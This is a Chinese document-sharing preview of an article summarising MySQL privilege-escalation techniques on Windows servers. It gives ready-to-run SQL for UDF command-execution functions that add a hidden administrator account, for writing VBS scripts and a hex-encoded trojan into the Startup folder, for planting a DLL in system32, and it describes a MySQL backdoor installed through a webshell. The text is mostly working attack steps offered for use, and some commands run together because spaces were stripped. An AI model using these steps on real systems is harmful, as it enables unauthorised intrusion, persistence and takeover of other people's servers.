返回
关于mysql提权方法总结

关于mysql提权方法总结

ID:8996596

大小:34.50 KB

页数:4页

时间:2018-04-14

关于mysql提权方法总结_第1页
关于mysql提权方法总结_第2页
关于mysql提权方法总结_第3页
关于mysql提权方法总结_第4页
资源描述:

《关于mysql提权方法总结》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps主机、服务器租用的中国信息港在这里为你做深入探讨!mysql提权总结方法四则一UDF提权这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:1createfunctioncmdshellreturnsstringsoname'udf.dll'2selectcmdshell('net

2、useriis_user123!@#abcABC/add');  3selectcmdshell('netlocalgroupadministratorsiis_user/add');  4selectcmdshell('regedit/sd:web3389.reg');  5dropfunctioncmdshell;  6selectcmdshell('netstat-an');二VBS启动项提权1createtablea(cmdtext);2insertintoavalues("setwshshell=createobject(""wscript.shell"")

3、");3insertintoavalues("a=wshshell.run(""cmd.exe/cnetuseriis_user123!@#abcABC/add"",0)");4insertintoavalues("b=wshshell.run(""cmd.exe/cnetlocalgroupadministratorsiis_user/add"",0)");5select*fromaintooutfile"C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动\a.vbs";先在webshell里连接上数据库,建立表,将V

4、BS写入表里,然后导入启动项,如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。还可以这样写:1createtablea(cmdBLOB);2insertintoavalues(CONVERT(木马的16进制代码,CHAR));3select*fromaintodumpfile'C:\DocumentsandSettings\AllUsers\「开始」菜单\程序启动\mm.exe'4droptablea;执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\,因

5、为windows会自动过滤掉一个三LinxMysqlBackDoor提权LinxMysqlDoorMysqlBackDoor是一款针对PHP+Mysql服务器开发的后门,该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马.用法:将Mysql.php传到PHP服务器上,点击"自动安装MysqlBackDoor",然后直接执行命令即可四,MIX.DLL提权1createtabletemp_mix(a

6、bclongblob);2insertintotemp_mixvalues(load_file('D:\web\udf.dll'));3select*fromtemp_mixintodumpfile'C:\Windows\system32\udf.dll';4createfunctionMyCmdreturnsstringsoname'udf.dll';5selectMyCmd('netuser');6droptableifexiststemp_mix;前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。而最容易出问题的就是第4句ca

7、n'topensharedlibrary'udf.dll'(error2);就说下他.先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数首先百度了下.说得是:1dropfunctionMyCmd;就可以删到已经建立的函数.测试了下发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG可以执行如下语句:1deletefrommysql.funcwherename='MyCmd';测试了下成功了.前天再次盯着屏幕上的can'topensharedlibrary'udf.dll'又看到了这条delete

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。